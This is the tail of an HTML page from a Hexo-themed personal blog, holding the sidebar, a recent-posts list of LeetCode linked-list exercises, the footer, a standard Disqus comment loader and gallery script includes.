                    </a>
                </li>
                
            
                
                <li>
                    <a class="social-tooltip" title="stack-overflow" href="/" target="_blank" rel="noopener">
                        <i class="icon fa fa-stack-overflow"></i>
                    </a>
                </li>
                
            
                
                <li>
                    <a class="social-tooltip" title="github" href="https://github.com/ppoffice/hexo-theme-hueman" target="_blank" rel="noopener">
                        <i class="icon fa fa-github"></i>
                    </a>
                </li>
                
            
                
                <li>
                    <a class="social-tooltip" title="weibo" href="/" target="_blank" rel="noopener">
                        <i class="icon fa fa-weibo"></i>
                    </a>
                </li>
                
            
                
                <li>
                    <a class="social-tooltip" title="rss" href="/" target="_blank" rel="noopener">
                        <i class="icon fa fa-rss"></i>
                    </a>
                </li>
                
            
        </ul>
    </div>
    
        
<nav id="article-nav">
    
        <a href="/2022/12/07/704.%E4%BA%8C%E5%88%86%E6%9F%A5%E6%89%BE/" id="article-nav-newer" class="article-nav-link-wrap">
        <strong class="article-nav-caption">més nou</strong>
        <p class="article-nav-title">
        
            (no title)
        
        </p>
        <i class="icon fa fa-chevron-right" id="icon-chevron-right"></i>
    </a>
    
    
</nav>

    
    <div class="widgets-container">
        
            
                

            
                
    <div class="widget-wrap">
        <h3 class="widget-title">recents</h3>
        <div class="widget">
            <ul id="recent-post" class="">
                
                    <li>
                        
                        <div class="item-thumbnail">
                            <a href="/2022/12/12/19-%E5%88%A0%E9%99%A4%E9%93%BE%E8%A1%A8%E7%9A%84%E5%80%92%E6%95%B0%E7%AC%ACN%E4%B8%AA%E8%8A%82%E7%82%B9/" class="thumbnail">
    
    
        <span class="thumbnail-image thumbnail-none"></span>
    
    
</a>

                        </div>
                        
                        <div class="item-inner">
                            <p class="item-category"></p>
                            <p class="item-title"><a href="/2022/12/12/19-%E5%88%A0%E9%99%A4%E9%93%BE%E8%A1%A8%E7%9A%84%E5%80%92%E6%95%B0%E7%AC%ACN%E4%B8%AA%E8%8A%82%E7%82%B9/" class="title">19.删除链表的倒数第N个节点</a></p>
                            <p class="item-date"><time datetime="2022-12-12T14:34:00.000Z" itemprop="datePublished">2022-12-12</time></p>
                        </div>
                    </li>
                
                    <li>
                        
                        <div class="item-thumbnail">
                            <a href="/2022/12/12/24.%E4%B8%A4%E4%B8%A4%E4%BA%A4%E6%8D%A2%E9%93%BE%E8%A1%A8%E4%B8%AD%E7%9A%84%E8%8A%82%E7%82%B9/" class="thumbnail">
    
    
        <span style="background-image:url(/2022/12/12/24.%E4%B8%A4%E4%B8%A4%E4%BA%A4%E6%8D%A2%E9%93%BE%E8%A1%A8%E4%B8%AD%E7%9A%84%E8%8A%82%E7%82%B9/%E4%B8%A4%E4%B8%A4%E4%BA%A4%E6%8D%A2%E9%93%BE%E8%A1%A8%E4%B8%AD%E7%9A%84%E8%8A%82%E7%82%B9.png)" alt="24.两两交换链表中的节点" class="thumbnail-image"></span>
    
    
</a>

                        </div>
                        
                        <div class="item-inner">
                            <p class="item-category"></p>
                            <p class="item-title"><a href="/2022/12/12/24.%E4%B8%A4%E4%B8%A4%E4%BA%A4%E6%8D%A2%E9%93%BE%E8%A1%A8%E4%B8%AD%E7%9A%84%E8%8A%82%E7%82%B9/" class="title">24.两两交换链表中的节点</a></p>
                            <p class="item-date"><time datetime="2022-12-12T13:14:48.000Z" itemprop="datePublished">2022-12-12</time></p>
                        </div>
                    </li>
                
                    <li>
                        
                        <div class="item-thumbnail">
                            <a href="/2022/12/11/206-%E5%8F%8D%E8%BD%AC%E9%93%BE%E8%A1%A8/" class="thumbnail">
    
    
        <span style="background-image:url(/2022/12/11/206-%E5%8F%8D%E8%BD%AC%E9%93%BE%E8%A1%A8/%E8%BF%87%E7%A8%8B.png)" alt="206.反转链表" class="thumbnail-image"></span>
    
    
</a>

                        </div>
                        
                        <div class="item-inner">
                            <p class="item-category"></p>
                            <p class="item-title"><a href="/2022/12/11/206-%E5%8F%8D%E8%BD%AC%E9%93%BE%E8%A1%A8/" class="title">206.反转链表</a></p>
                            <p class="item-date"><time datetime="2022-12-11T04:18:57.000Z" itemprop="datePublished">2022-12-11</time></p>
                        </div>
                    </li>
                
                    <li>
                        
                        <div class="item-thumbnail">
                            <a href="/2022/12/10/707.%E8%AE%BE%E8%AE%A1%E9%93%BE%E8%A1%A8/" class="thumbnail">
    
    
        <span class="thumbnail-image thumbnail-none"></span>
    
    
</a>

                        </div>
                        
                        <div class="item-inner">
                            <p class="item-category"></p>
                            <p class="item-title"><a href="/2022/12/10/707.%E8%AE%BE%E8%AE%A1%E9%93%BE%E8%A1%A8/" class="title">707.设计链表</a></p>
                            <p class="item-date"><time datetime="2022-12-10T14:52:40.000Z" itemprop="datePublished">2022-12-10</time></p>
                        </div>
                    </li>
                
                    <li>
                        
                        <div class="item-thumbnail">
                            <a href="/2022/12/10/203.%E7%A7%BB%E9%99%A4%E9%93%BE%E8%A1%A8%E5%85%83%E7%B4%A0/" class="thumbnail">
    
    
        <span class="thumbnail-image thumbnail-none"></span>
    
    
</a>

                        </div>
                        
                        <div class="item-inner">
                            <p class="item-category"></p>
                            <p class="item-title"><a href="/2022/12/10/203.%E7%A7%BB%E9%99%A4%E9%93%BE%E8%A1%A8%E5%85%83%E7%B4%A0/" class="title">203.移除链表元素</a></p>
                            <p class="item-date"><time datetime="2022-12-10T13:58:39.000Z" itemprop="datePublished">2022-12-10</time></p>
                        </div>
                    </li>
                
            </ul>
        </div>
    </div>

            
                

            
                
    <div class="widget-wrap widget-list">
        <h3 class="widget-title">arxius</h3>
        <div class="widget">
            <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/12/">December 2022</a><span class="archive-list-count">11</span></li></ul>
        </div>
    </div>


            
                

            
                

            
                
    <div class="widget-wrap widget-list">
        <h3 class="widget-title">links</h3>
        <div class="widget">
            <ul>
                
                    <li>
                        <a target="_blank" rel="noopener" href="http://hexo.io">Hexo</a>
                    </li>
                
            </ul>
        </div>
    </div>


            
        
    </div>
</aside>

                </div>
            </div>
        </div>
        <footer id="footer">
    <div class="container">
        <div class="container-inner">
            <a id="back-to-top" href="javascript:;"><i class="icon fa fa-angle-up"></i></a>
            <div class="credit">
                <h1 class="logo-wrap">
                    <a href="/" class="logo"></a>
                </h1>
                <p>&copy; 2022 Liu Yi</p>
                
                <p>Powered by <a href="https://hexo.io/" target="_blank">Hexo</a>. Theme by <a href="https://github.com/ppoffice" target="_blank">PPOffice</a></p>
                
            </div>
            <div class="footer-plugins">
              
    


            </div>
        </div>
    </div>
</footer>

    </div>
    
    
    <script>
    var disqus_shortname = 'hexo-theme-hueman';
    
    
    var disqus_url = 'https://xduly.github.io/2022/12/07/Solidity%E9%87%8D%E5%85%A5%E6%94%BB%E5%87%BB%E6%B7%B1%E5%85%A5%E7%90%86%E8%A7%A3/';
    
    (function() {
    var dsq = document.createElement('script');
    dsq.type = 'text/javascript';
    dsq.async = true;
    dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';
    (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
    })();
    </script>





    
        
<script src="/libs/lightgallery/js/lightgallery.min.js"></script>

        
<script src="/libs/lightgallery/js/lg-thumbnail.min.js"></script>

        
<script src="/libs/lightgallery/js/lg-pager.min.js"></script>

        
<script src="/libs/lightgallery/js/lg-autoplay.min.js"></script>

        
<script src="/libs/lightgallery/js/lg-fullscreen.min.js"></script>

        
<script src="/libs/lightgallery/js/lg-zoom.min.js"></script>

        
<script src="/libs/lightgallery/js/lg-hash.min.js"></script>

        
<script src="/libs/lightgallery/js/lg-share.min.js"></script>

        
<script src="/libs/lightgallery/js/lg-video.min.js"></script>

    
    
        
<script src="/libs/justified-gallery/jquery.justifiedGallery.min.js"></script>

    
    

    
    
    



<!-- Custom Scripts -->

<script src="/js/main.js"></script>


</body>
</html>
